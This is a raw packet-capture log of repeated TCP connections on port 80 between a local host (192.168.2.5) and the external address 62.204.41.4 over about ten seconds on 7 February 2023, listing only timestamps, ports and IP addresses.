Feb 7, 2023 19:58:35.126708984 CET	80	50030	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:35.131793022 CET	50030	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:35.241107941 CET	50030	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:35.241744995 CET	50031	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:35.303476095 CET	80	50030	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:35.303654909 CET	50030	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:35.303798914 CET	80	50031	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:35.303905010 CET	50031	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:35.304361105 CET	50031	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:35.366919041 CET	80	50031	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:35.369082928 CET	80	50031	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:35.369293928 CET	50031	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:35.479578972 CET	50031	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:35.480576992 CET	50032	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:35.542030096 CET	80	50031	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:35.542105913 CET	80	50032	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:35.549848080 CET	50031	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:35.549935102 CET	50032	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:35.551487923 CET	50032	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:35.613054037 CET	80	50032	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:35.615287066 CET	80	50032	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:35.616063118 CET	50032	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:35.736371994 CET	50032	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:35.737314939 CET	50033	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:35.798734903 CET	80	50032	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:35.798784971 CET	80	50033	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:35.798955917 CET	50032	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:35.799030066 CET	50033	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:35.799544096 CET	50033	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:35.860903978 CET	80	50033	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:35.863296986 CET	80	50033	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:35.863473892 CET	50033	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:35.977458954 CET	50033	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:35.978274107 CET	50035	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:36.038645029 CET	80	50035	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:36.038882017 CET	50035	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:36.038930893 CET	80	50033	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:36.039047003 CET	50033	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:36.040024996 CET	50035	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:36.101363897 CET	80	50035	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:36.104940891 CET	80	50035	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:36.105120897 CET	50035	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:36.211746931 CET	50035	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:36.213012934 CET	50036	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:36.272387028 CET	80	50035	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:36.272592068 CET	50035	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:36.274570942 CET	80	50036	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:36.274748087 CET	50036	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:36.277045965 CET	50036	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:36.338560104 CET	80	50036	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:36.341039896 CET	80	50036	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:36.341187000 CET	50036	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:36.445662975 CET	50036	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:36.446506023 CET	50037	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:36.507301092 CET	80	50037	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:36.507338047 CET	80	50036	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:36.507556915 CET	50036	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:36.509529114 CET	50037	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:36.516957045 CET	50037	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:36.577594042 CET	80	50037	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:36.582451105 CET	80	50037	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:36.582634926 CET	50037	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:36.696878910 CET	50037	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:36.697798014 CET	50038	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:36.757600069 CET	80	50037	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:36.757704973 CET	50037	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:36.758444071 CET	80	50038	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:36.758559942 CET	50038	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:36.760812998 CET	50038	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:36.821259022 CET	80	50038	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:36.823707104 CET	80	50038	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:36.823817015 CET	50038	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:36.934111118 CET	50038	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:36.934998035 CET	50039	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:36.994792938 CET	80	50038	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:36.994870901 CET	50038	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:36.995501995 CET	80	50039	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:36.995634079 CET	50039	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:36.996098995 CET	50039	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:37.056499958 CET	80	50039	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:37.060569048 CET	80	50039	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:37.060687065 CET	50039	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:37.165743113 CET	50039	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:37.166713953 CET	50040	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:37.226412058 CET	80	50039	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:37.226541042 CET	50039	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:37.227593899 CET	80	50040	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:37.227744102 CET	50040	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:37.231251001 CET	50040	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:37.292577028 CET	80	50040	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:37.294770002 CET	80	50040	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:37.294903040 CET	50040	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:37.402143002 CET	50040	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:37.402795076 CET	50041	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:37.462882042 CET	80	50040	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:37.463675022 CET	50040	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:37.464374065 CET	80	50041	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:37.464648008 CET	50041	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:37.467492104 CET	50041	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:37.529136896 CET	80	50041	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:37.533015013 CET	80	50041	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:37.533212900 CET	50041	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:37.652570963 CET	50041	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:37.654527903 CET	50042	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:37.714456081 CET	80	50041	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:37.714765072 CET	80	50042	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:37.714874983 CET	50041	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:37.714915037 CET	50042	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:37.715383053 CET	50042	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:37.778004885 CET	80	50042	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:37.778399944 CET	80	50042	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:37.778557062 CET	50042	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:37.883855104 CET	50042	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:37.884799004 CET	50043	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:37.944281101 CET	80	50042	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:37.944364071 CET	50042	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:37.945080996 CET	80	50043	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:37.945200920 CET	50043	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:37.945631981 CET	50043	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:38.005942106 CET	80	50043	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:38.008440971 CET	80	50043	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:38.008687973 CET	50043	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:38.118597984 CET	50043	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:38.119760990 CET	50044	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:38.179189920 CET	80	50043	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:38.179344893 CET	50043	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:38.180176020 CET	80	50044	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:38.180334091 CET	50044	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:38.182719946 CET	50044	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:38.243109941 CET	80	50044	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:38.247263908 CET	80	50044	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:38.248208046 CET	50044	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:38.352543116 CET	50044	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:38.353543043 CET	50045	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:38.413213968 CET	80	50044	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:38.413436890 CET	50044	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:38.413831949 CET	80	50045	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:38.413976908 CET	50045	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:38.414557934 CET	50045	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:38.475408077 CET	80	50045	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:38.478013039 CET	80	50045	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:38.478169918 CET	50045	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:38.602370024 CET	50045	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:38.603365898 CET	50046	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:38.663841009 CET	80	50045	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:38.663991928 CET	50045	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:38.668272018 CET	80	50046	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:38.668484926 CET	50046	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:38.668972015 CET	50046	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:38.731177092 CET	80	50046	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:38.733588934 CET	80	50046	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:38.733757019 CET	50046	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:38.836988926 CET	50046	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:38.837973118 CET	50047	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:38.898639917 CET	80	50047	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:38.898834944 CET	50047	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:38.899368048 CET	80	50046	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:38.899455070 CET	50046	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:38.899810076 CET	50047	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:38.961930037 CET	80	50047	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:38.965450048 CET	80	50047	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:38.965605021 CET	50047	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:39.070918083 CET	50047	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:39.071810961 CET	50048	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:39.133193970 CET	80	50047	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:39.133378029 CET	50047	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:39.135747910 CET	80	50048	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:39.135901928 CET	50048	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:39.136452913 CET	50048	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:39.197968006 CET	80	50048	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:39.201817036 CET	80	50048	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:39.201997995 CET	50048	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:39.318109035 CET	50048	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:39.318979025 CET	50049	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:39.382900000 CET	80	50048	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:39.382936001 CET	80	50049	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:39.383013010 CET	50048	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:39.383091927 CET	50049	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:39.386684895 CET	50049	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:39.447056055 CET	80	50049	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:39.449786901 CET	80	50049	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:39.449904919 CET	50049	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:39.556368113 CET	50049	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:39.557163000 CET	50050	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:39.617089033 CET	80	50049	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:39.617166996 CET	50049	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:39.619488001 CET	80	50050	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:39.619615078 CET	50050	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:39.622153997 CET	50050	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:39.684957981 CET	80	50050	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:39.687675953 CET	80	50050	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:39.687791109 CET	50050	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:39.795535088 CET	50050	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:39.796276093 CET	50051	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:39.857460022 CET	80	50050	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:39.857579947 CET	50050	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:39.858774900 CET	80	50051	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:39.858889103 CET	50051	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:39.861263990 CET	50051	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:39.923810005 CET	80	50051	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:39.926196098 CET	80	50051	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:39.926285028 CET	50051	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:40.042253971 CET	50051	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:40.043329000 CET	50052	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:40.104309082 CET	80	50052	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:40.104428053 CET	50052	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:40.104968071 CET	80	50051	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:40.105000973 CET	50052	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:40.105031013 CET	50051	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:40.166882992 CET	80	50052	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:40.171942949 CET	80	50052	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:40.172051907 CET	50052	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:40.290296078 CET	50052	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:40.291318893 CET	50053	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:40.352916002 CET	80	50052	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:40.353065968 CET	50052	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:40.354126930 CET	80	50053	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:40.354383945 CET	50053	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:40.354567051 CET	50053	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:40.417835951 CET	80	50053	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:40.422944069 CET	80	50053	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:40.423378944 CET	50053	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:40.540332079 CET	50053	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:40.541026115 CET	50054	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:40.603817940 CET	80	50053	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:40.603858948 CET	80	50054	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:40.604044914 CET	50054	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:40.604509115 CET	50054	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:40.604801893 CET	50053	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:40.666301012 CET	80	50054	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:40.668494940 CET	80	50054	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:40.669574022 CET	50054	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:40.774143934 CET	50054	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:40.775388956 CET	50055	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:40.839256048 CET	80	50054	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:40.840012074 CET	50054	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:40.840636969 CET	80	50055	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:40.840751886 CET	50055	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:40.841197014 CET	50055	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:40.905011892 CET	80	50055	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:40.907582045 CET	80	50055	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:40.907768965 CET	50055	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:41.029644966 CET	50055	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:41.030584097 CET	50056	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:41.092907906 CET	80	50056	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:41.092956066 CET	80	50055	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:41.093127012 CET	50055	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:41.093534946 CET	50056	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:41.093534946 CET	50056	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:41.154926062 CET	80	50056	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:41.158943892 CET	80	50056	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:41.163228035 CET	50056	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:41.275733948 CET	50056	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:41.276565075 CET	50057	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:41.339543104 CET	80	50056	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:41.339710951 CET	50056	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:41.341079950 CET	80	50057	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:41.341296911 CET	50057	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:41.341645956 CET	50057	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:41.403469086 CET	80	50057	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:41.405617952 CET	80	50057	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:41.405776024 CET	50057	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:41.509258032 CET	50057	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:41.510155916 CET	50058	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:41.570684910 CET	80	50058	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:41.570873022 CET	50058	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:41.571233988 CET	80	50057	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:41.571326971 CET	50057	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:41.573760986 CET	50058	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:41.634011030 CET	80	50058	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:41.636914968 CET	80	50058	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:41.637083054 CET	50058	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:41.757038116 CET	50058	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:41.758171082 CET	50059	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:41.817897081 CET	80	50058	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:41.818089008 CET	50058	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:41.822145939 CET	80	50059	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:41.822314024 CET	50059	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:41.853764057 CET	50059	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:41.914884090 CET	80	50059	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:41.918071985 CET	80	50059	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:41.918215990 CET	50059	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:42.227528095 CET	50059	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:42.228416920 CET	50060	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:42.289659977 CET	80	50059	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:42.289772987 CET	50059	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:42.291766882 CET	80	50060	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:42.291950941 CET	50060	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:42.295231104 CET	50060	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:42.358907938 CET	80	50060	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:42.361862898 CET	80	50060	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:42.361996889 CET	50060	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:42.509346962 CET	50060	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:42.510121107 CET	50061	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:42.573513031 CET	80	50061	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:42.573714972 CET	50061	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:42.573848009 CET	80	50060	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:42.573920012 CET	50060	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:42.609484911 CET	50061	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:42.670248032 CET	80	50061	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:42.673573017 CET	80	50061	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:42.673702955 CET	50061	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:42.817224026 CET	50061	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:42.818085909 CET	50062	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:42.882853031 CET	80	50061	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:42.882993937 CET	50061	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:42.886656046 CET	80	50062	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:42.886828899 CET	50062	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:42.938577890 CET	50062	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:43.003619909 CET	80	50062	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:43.007873058 CET	80	50062	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:43.008042097 CET	50062	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:43.850856066 CET	50062	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:43.851598024 CET	50063	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:43.916533947 CET	80	50062	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:43.916627884 CET	50062	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:43.918009043 CET	80	50063	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:43.918219090 CET	50063	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:43.919704914 CET	50063	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:43.985042095 CET	80	50063	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:43.990259886 CET	80	50063	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:43.990432024 CET	50063	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:44.155812025 CET	50063	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:44.156497002 CET	50064	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:44.222824097 CET	80	50063	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:44.222858906 CET	80	50064	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:44.223270893 CET	50063	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:44.223299980 CET	50064	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:44.287580013 CET	50064	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:44.350876093 CET	80	50064	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:44.354840040 CET	80	50064	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:44.354981899 CET	50064	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:45.178340912 CET	50064	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:45.179030895 CET	50065	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:45.240487099 CET	80	50065	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:45.240705013 CET	80	50064	62.204.41.4	192.168.2.5
Feb 7, 2023 19:58:45.240899086 CET	50065	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:45.242264032 CET	50064	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:45.626873970 CET	50065	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:58:45.689830065 CET	80	50065	62.204.41.4	192.168.2.5
